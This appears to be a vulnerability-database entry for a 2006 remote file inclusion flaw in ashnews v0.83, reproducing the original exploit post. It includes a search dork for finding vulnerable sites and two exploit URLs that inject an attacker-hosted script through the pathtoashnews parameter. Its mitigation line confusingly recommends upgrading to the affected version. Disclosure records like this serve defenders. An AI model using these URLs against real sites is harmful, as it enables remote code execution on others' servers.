ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities

vendor:

ashnews

by:

Kacper (Rahim)

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: ashnews

Affected Version From: v0.83

Affected Version To: v0.83

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

ashnews v0.83(pathtoashnews) – Remote File Include Vulnerabilities

A vulnerability in ashnews v0.83 allows remote attackers to include arbitrary files via a URL in the pathtoashnews parameter to ashheadlines.php or ashnews.php.

Mitigation:

Upgrade to the latest version of ashnews v0.83 or later.

Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
# Script site: http://dev.ashwebstudio.com/
# dork: News powered by ashnews
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]

http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-06-02]